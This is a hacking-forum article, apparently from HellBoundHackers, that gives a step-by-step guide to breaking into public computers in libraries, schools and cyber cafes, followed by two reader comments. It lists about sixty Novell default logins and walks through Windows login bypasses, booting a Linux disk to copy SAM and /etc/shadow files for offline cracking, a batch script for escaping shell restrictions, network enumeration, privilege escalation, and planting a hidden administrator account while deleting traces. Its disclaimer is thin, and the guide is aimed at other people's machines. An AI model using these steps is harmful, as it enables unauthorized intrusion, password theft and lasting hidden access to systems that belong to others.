Follow us on Twitter!
The important thing is not to stop questioning. - Albert Einstein
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 19
Guests Online: 18
Members Online: 1

Registered Members: 82889
Newest Member: Geriztul
Latest Articles

Physical Intrusion

Arrow Image A small guide about physical intrusion and its various aspects



+{_OPENING_}+

After some expieramentation, I decided to write a guide to physical access. this will not cover how to get that access, that is an exercise that will be left up to the reader. This is a guide that will cover steps to take after physical access has been achived, and will cover such topics as getting into the system, gainig command prompt, and (maybe) getting an elevated privilage level. [DISCLAMER] This paper was not posted with malicious intent. Instead it was posted to further knowledge of physical intrusion and how to conduct test of it on your own networks. If you do choose to use this knowledge to gain unauthorized access to a network, your on your own. Neither I, the authour (n3w7yp3), nor the site that this is posted on will be responsible for your actions in any way shape or form. If you fuck up, you\'re on your own! [/DISCLAIMER]

+{_PHASE 1_}+

The first phase of physical intrusion (as with any hacking) is a good amount of recon. The more you know about the system(s), the better chance that you have of getting in. when you finda place that has public access terminals (local library, cyber cafe, your school, etc), there are several obersvations that you shouldmake. First, what OS do they run? do they use that OSs standard login screen or something differnt (eg: Novell)? what is the version number(s)? these are things to noyce about the software. As for physical things, do the computers have any disc drives? If so are they CD, floppy, ZIP, DVD a combination or any other types? Be sure to see of it has a floppy drive, as this can be used to easily preform some otherwise difficult top complete steps later. Take alook at the staff who are supposed to keep an eye on the users. This could be a librarian, teacher, cyber cafe staff member, etc. Are they attentive? do they walk around? do they glace over users shoulders? Also, try to become a regular at the target. Don\'t just come in twice (once to gather recon and the next to exploit), instead come a few days a week for about a month. That way the staff will get used to seeing you there. Take note of any other details that seem interesting. Try to learn as much as you can. But be sure to hide your knowledge. That could give you away. Now that you have gathered some knowledge about the target (and if you have not stop reading and do that recon!), it is time to assemble the list of what we will bring along. Here is a list of items that i find are useful:

1. a small mirror like the type found in a womans cosmetic set (for seeing behid you and to the sides)
2. a floppy disc (this can ontain several things. the most common is a linux boot disk)
3. pen and paper (to write down useful info)

well that was a short list. but that is really all thgat you need. Now lets get to the next phase, Compromise.

+{_PHASE 2_}+

This is the compromise phase. in this phase you will go and gain access to the network. the stages that we will cover are:

1. Gain access to the system
2. Gain access to the network (if not already connected)
3. Gain a command prompt
4. Gain an elevated privialge level

Remember, when you go in there it *will* be tense. Speed is of the essence. But you have to try to look relaxed (if you don\'t it will draw attention to yourself). Try to dress like the other people at this palce. That way you blend in (no, you can\'t wear your 2600 t-shirt...). Basic social engeneering (SE) skills may come into play. Be ready. Make sure that you ahev an excues as to why you are doing what you are doing. This will help to waylay suspicions if you are caught. And be sure to reherse this excuse so you can say it with out tripping over your words.

Now when you first walk in, you will be presented with a choice of computers. Try to pick one away from most people preferably with a screen that is hard to see if some one is shoulder surfing. From your recon you should know various details about the system, including how you login to it. Most likely you have a username nad password to the system. If not, we have several thing you can try. The first is deafult passwords. Most systems contain a few of these. Here are some of the deafult passwds for Novell (courtesy of www.cirt.net):

1. Novell
Product Groupwise 5.5 Enhancement Pack
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes

2. Novell
Product Groupwise 6.0
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes

3. Novell
Product iManager
Version 2.0.1
Method
User ID admin
Password novell
Level Administrator
Notes

4. Novell
Product NDS iMonitor
Version
Method HTTP
User ID sadmin
Password (none)
Level Administrator
Notes

5. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password (none)
Level N/A
Notes

6. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password ADMIN
Level N/A
Notes

7. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password (none)
Level N/A
Notes

8. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password ARCHIVIST
Level N/A
Notes

9. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password (none)
Level N/A
Notes

10. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password BACKUP
Level N/A
Notes

11. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password (none)
Level N/A
Notes

12. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password CHEY_ARCHSVR
Level N/A
Notes

13. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password (none)
Level N/A
Notes

14. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password FAX
Level N/A
Notes

15. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password (none)
Level N/A
Notes

16. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password FAXUSER
Level N/A
Notes

17. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password (none)
Level N/A
Notes

18. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password FAXWORKS
Level N/A
Notes

19. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password (none)
Level N/A
Notes

20. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password GATEWAY
Level N/A
Notes

21. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password (none)
Level N/A
Notes

22. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUEST
Level N/A
Notes

23. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUE
Level N/A
Notes

24. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUEST
Level N/A
Notes

25. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password TSEUG
Level N/A
Notes

26. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password (none)
Level N/A
Notes

27. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password HPLASER
Level N/A
Notes

28. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password (none)
Level N/A
Notes

29. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password LASER
Level N/A
Notes

30. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password (none)
Level N/A
Notes

31. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password LASERWRITER
Level N/A
Notes

32. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password (none)
Level N/A
Notes

33. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password MAIL
Level N/A
Notes

34. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password (none)
Level N/A
Notes

35. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password POST
Level N/A
Notes

36. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password (none)
Level N/A
Notes

37. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password PRINT
Level N/A
Notes

38. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password (none)
Level N/A
Notes

39. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password PRINTER
Level N/A
Notes

40. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password (none)
Level N/A
Notes

41. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password ROOT
Level N/A
Notes

42. Novell
Product Netware
Version N/A
Method Multi
User ID ROUTER
Password (none)
Level N/A
Notes

43. Novell
Product Netware
Version N/A
Method Multi
User ID SABRE
Password (none)
Level N/A
Notes

44. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password (none)
Level N/A
Notes

45. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password HARRIS
Level N/A
Notes

46. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NETFRAME
Level N/A
Notes

47. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NF
Level N/A
Notes

48. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NFI
Level N/A
Notes

49. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SUPERVISOR
Level N/A
Notes

50. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SYSTEM
Level N/A
Notes

51. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password (none)
Level N/A
Notes

52. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password TEST
Level N/A
Notes

53. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password (none)
Level N/A
Notes

54. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password USER_TEMPLATE
Level N/A
Notes

55. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password (none)
Level N/A
Notes

56. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password WANGTEK
Level N/A
Notes

57. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password (none)
Level N/A
Notes

58. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password WINDOWS_PASSTHRU
Level N/A
Notes

59. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password SABRE
Level N/A
Notes

60. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password WINSABRE
Level N/A
Notes


Now, the system might not have Novell installed or none of those work. Well, if it is Windows 9x, simply poweroff the system (a hard poweroff will be just fine), unplug the ethernet cable fom the back and reboot. then at the login screen click `cancle\'. Sometimes that will let you on. at this point create a new account and poweroff the system. replace the ethernet cable and boot it back up. then login in with the username/pass that you have just entered (you might have to select the `Local workstation only\' option). If the system is Windows XP, try selecting the `Local Workstatrion only\' option and entering the username as `Administrator\' with no password. I have found that that works at my school. If none of these work (or none are viable), poweroff the machine. Now rebbot it and try to boot to get the boot menu (press the F8 ket during the boot process). If it comes up, select option 7 for the command line. Then entern the following commands (for Windows 9x):

C:\\>cd windows
C:\\WINDOWS> ren *.pwl *.txt

then exit the command line and reboot. now when the login screen comes up you can enter anything as the username nad password (you might have to check the `local workstation only\' box). if that fails, try to boot into safe mode (press and hold F5 during startup). If this succedes, it may give you Admin privilages. If it does, then the admin who oversees this network has \"As much intelligence as 2 tin cans and a rubber band\". At this point add a username, rebbot and login (again dont forget the `Local Workstation only\' box). Alright, if all that has failed, insert your startup disk. You should have a Linux boot disk as well as one that matches the OS that we are trying to gain access to. Insert the one that matches the OS that we\'re hacking and reboot. now at the command prompt try the following:

C:\\>cd windows
C:\\WINDOWS>win

Hopefully, that will boot us into windows. However chances are that that will not work. If that is the case, power off the box and insert the Linux boot disk. At this point are goal is to copy the password file to the disk and crack it at home. here are some common locations of password files:

Windows

*SAM file:
C:\\WINDOWS\\system32\\config\\sam
C:\\WINDOWS\\system32\\config\\sam.txt
HKEY_LOCAL_MACHINE\\SAM
C:\\WINDOWS\\system32repair\\sam

UNIX (and its varients. Linux, FreeBSD, etc)

*password file(s):
/etc/passwd
/etc/shadow
/.secure/etc/passwd
/etc/smbpasswd
/etc/nis/passwd
/etc/master.passwd
/etc/security/passwd
/etc/shadow-
/etc/shadow.lock (binary file)

VNC

*Windows:
HKEY_USURS\\.DEAFULT\\SOFTWARE\\ORL\\WinVNC3\\Password

*UNIX:
$HOME/.vnc/paswd

if you can\'t find the passwd file, go on google and run a search for the OS and it password file location. If you do get the password file, go home and crack it. then come back and login.

Okay, by this time we should have local access (one way or another). Also, set up the cosmetic mirror so that you can see behind you. and keep an eye on it. it is your early warning system in case some one comes up behind you. Now, your next goal is to get command prompt access. First lets try the eaisest things:

In Windows:

1. Click start run and type cmd (works for all but Win 9x)
2. Click start my programs, accessories and then cmd (again, all but win 9x)
3. Clcik start, programs and then MS_DOS prompt (works for Win 9x)

In *nix:

1. Right click on the desktop and select new terminal
2. Click on the main menu, system tools and then terminal

Now if any of those work, then congrats, you have a shell. If not (which is more likley) then we have a few more things to try.

In Windows:

1. Open up IE and type C:\\ if it lets you in navigate to the location of the command line and clcik on the icon. you\'re in
2. Open Notepad. type in the following code (save it as 8.cmd if you\'re on Win2K/XP. save it as *bat otherwise):
Code

@ECHO OFF
CLS
START C:\\COMMAND.COM
START C:\\WINDOWS\\COMMAND.COM
START C:\\SYSTEM\\COMMAND.COM
START C:\\WINDOWS\\SYSTEM\\COMMAND.COM
START C:\\WINNT\\CMD.EXE
START C:\\WINNT\\COMMAND.COM
START C:\\WINNT\\SYSTEM32\\CMD.EXE
START C:\\WINNT\\SYSTEM32\\COMMAND.COM
START C:\\WINDOWS\\SYSTEM32\\CMD.EXE
START C:\\WINDOWS\\SYSTEM32\\COMMAND.COM
START c:\\WINDOWS\\CMD.EXE
START C:\\CMD.EXE
CALL COMMAND.COM
CALL CMD.EXE




2a. Now run it. I have never failed to get command line access using this script.
3. If that fails try the following: open up Notepad. now type in the following HTML code and save it as a *.html:

[HTML]
[HEAD]
[TITLE]HD Access[/TITLE]
[/HEAD]
[BODY]
[P][A HREF=\"file:///C:\"]Click here for C: drive access[/A][/P]
[/BODY]
[/HTML]

NOTE: be sure to remove the [ ] and replace them with the normal HTML tags.

3a. now open that *.html and click the link. everywhere that i have tried this, it has given me access.
4. Bring command.com on a floppy disk and execute it.

Anywhoo, you should have a command line one way or another. Now it is time to gather some info about the network. Here are some commands that can help us do this:

net view
net view /domain
net view /domain:domainame
ipconfig
ipconfig /all
ipconfig /displaydns
route print
arp -a
nbtstat -a [computer]
nbtstat -A [computer]
net use
netstat -an
nslookup (set the query type to any [all] and query the networks name server)
hostname
tracert [host]

alright from that little list we have gathered a good deal of info about the host/network. we know thier hostname naming schecme (from the `hostname\' command) and now we can guess other hostnames and use `nbtstat\' to query them to find out info. we know domain names from `net view /domain\' and the computers in those domains from `net view /domain:domainame\'. We learned what hosts on the intranet we are connected to from the `netstat -an\' command. `tracert\' if pointed towards an outside host (eg: www.google.com) will give us an idea of thier network structure, and maybe give us the IP of the gateway and/or router aloing with other hosts. well, now that we have some oinfo lets move on to the next phase: escalate

+{_PHASE 3_}+

Now it is time for us to get an elevated privilage level. First lets try the `at\' command if it works then \"YAY!!!\". make it spawn a shell in a minuet (btw: oit will be the highest level, SYSTEM, whwich is even higher than admin). If not which is more likley, try to copy the passwd files to a disk (see the above section on boot disks), cracking it and then logging back in as an admin level acct. If all else fails, try to download and execute a local exploit on the system (yes, i know its lame). Okay, hopefully we got a elevated privilage level by some means....

+{_PHASE 4_}+

Now it is time for the final phase, hiding our tracks. The first thing to do is to delete all the file that we made earlier. then add an extra admin/SYSTEM/root/super user account. Give it a good strong password. then log off and walk away, knowing that you have access. BTW; don\'t forget the things you brought along!

+{_CLOSING_}+

Well, i hope that somebody out there learns something from this. Remember, don\'t be a black-hat/cracker and use the knowledge that you aquire for damaging systems. Always follow the Hacker Ethic. Well, thats all from me.

peace,
--n3w7yp3

-=EOF=-

Comments

SANTAon June 11 2007 - 08:50:00
ROFL NOOB jesus christ this is a joke. I couldnt gain access with this guide even if i tried. and you said white-hats feed the skiddies now every starbucks is gunna be swamped with skiddies trying this thanks. Now my methods of intrusion are going to ahve to be advanced oh well i should have upgraded them a long time ago but i have a VB app that gets you admin PW without a linux disc it just shuts down the process that is using the sam file then copys the file to disc so go dig a hole and die in it loser!
TotcoSon June 18 2007 - 13:29:00
wow..santa is crazy..lmfaoShock
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.